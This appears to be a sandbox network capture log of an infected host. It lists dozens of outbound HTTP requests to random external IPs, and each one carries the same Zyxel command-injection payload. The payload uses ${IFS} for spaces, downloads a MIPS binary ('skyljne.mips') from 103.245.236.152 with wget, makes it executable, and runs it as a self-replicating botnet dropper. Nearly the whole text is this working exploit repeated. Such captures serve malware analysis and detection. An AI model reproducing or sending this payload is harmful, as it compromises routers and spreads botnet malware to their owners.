                                      Jan 14, 2024 15:50:35.035166979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1580192.168.2.14553302.159.219.195443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035201073 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1581192.168.2.144190895.17.175.242443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035238981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1582192.168.2.1449224177.233.156.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035278082 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1583192.168.2.1457006113.68.164.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035327911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1584192.168.2.145518869.114.235.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035384893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1585192.168.2.1447652169.182.166.75443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035408974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1586192.168.2.1440148117.221.9.57443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035444975 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1587192.168.2.1441672201.60.54.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035511971 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1588192.168.2.1441228146.80.131.86443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035552025 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1589192.168.2.1458878222.91.7.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:35.035583973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1590192.168.2.1441040140.198.208.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045018911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1591192.168.2.144933863.88.240.14443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045056105 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1592192.168.2.1438006174.247.65.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045130014 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1593192.168.2.1443184186.238.128.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045164108 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1594192.168.2.1450088155.209.17.208443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045223951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1595192.168.2.1439770135.169.155.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045265913 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1596192.168.2.145914064.244.155.98443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045299053 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1597192.168.2.1458976112.67.174.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045321941 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1598192.168.2.144220094.131.247.119443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045377016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1599192.168.2.1443134159.22.122.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045408964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1600192.168.2.1433190155.30.61.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045434952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1601192.168.2.1444132217.246.62.28443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045505047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1602192.168.2.1456850110.242.236.88443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045536995 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1603192.168.2.146053058.17.136.101443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045558929 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1604192.168.2.1455108202.138.244.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045634985 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1605192.168.2.144344241.253.123.182443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045655966 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1606192.168.2.1453522120.16.193.153443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045691013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1607192.168.2.145007013.125.6.13443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045748949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1608192.168.2.145051280.193.145.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045795918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1609192.168.2.14331381.197.255.114443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045836926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1610192.168.2.1447864176.230.175.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045850039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1611192.168.2.143797248.192.80.69443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045907974 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1612192.168.2.1441434160.133.221.62443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.045974016 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1613192.168.2.144951063.81.168.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046025991 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1614192.168.2.1433702181.85.105.60443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046051979 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1615192.168.2.145385460.158.158.253443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046092987 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1616192.168.2.1451330150.120.218.9443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046106100 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1617192.168.2.1457666192.247.169.238443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046159029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1618192.168.2.1454836110.158.112.231443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046200037 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1619192.168.2.144579437.33.208.154443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046237946 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1620192.168.2.1438832123.213.182.94443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046295881 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1621192.168.2.1432936184.255.219.95443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046314001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1622192.168.2.1447262189.177.28.63443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046340942 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1623192.168.2.144970252.31.58.31443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046382904 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1624192.168.2.145132887.152.57.49443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046431065 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1625192.168.2.145776064.4.100.72443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046447039 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1626192.168.2.145711818.119.206.67443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046495914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1627192.168.2.143402076.147.43.5443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046551943 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1628192.168.2.143526660.120.51.157443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046586990 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1629192.168.2.145520062.157.226.45443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046628952 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1630192.168.2.145691447.150.189.134443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046653032 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1631192.168.2.143464491.239.255.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046694994 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1632192.168.2.144860088.105.253.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046725035 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1633192.168.2.1447310161.181.187.173443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046752930 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1634192.168.2.1446036166.165.204.210443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046808004 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1635192.168.2.1438488113.107.118.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046861887 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1636192.168.2.145558063.32.45.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046884060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1637192.168.2.144362864.226.254.89443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046911001 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1638192.168.2.144904041.127.205.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046946049 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1639192.168.2.144587486.136.255.12443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046967983 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1640192.168.2.1437038157.31.247.217443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.046982050 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1641192.168.2.1453944193.180.95.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:50:36.047039986 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      1642192.168.2.1460116218.11.4.206443
                                      TimestampBytes transferredDirectionData
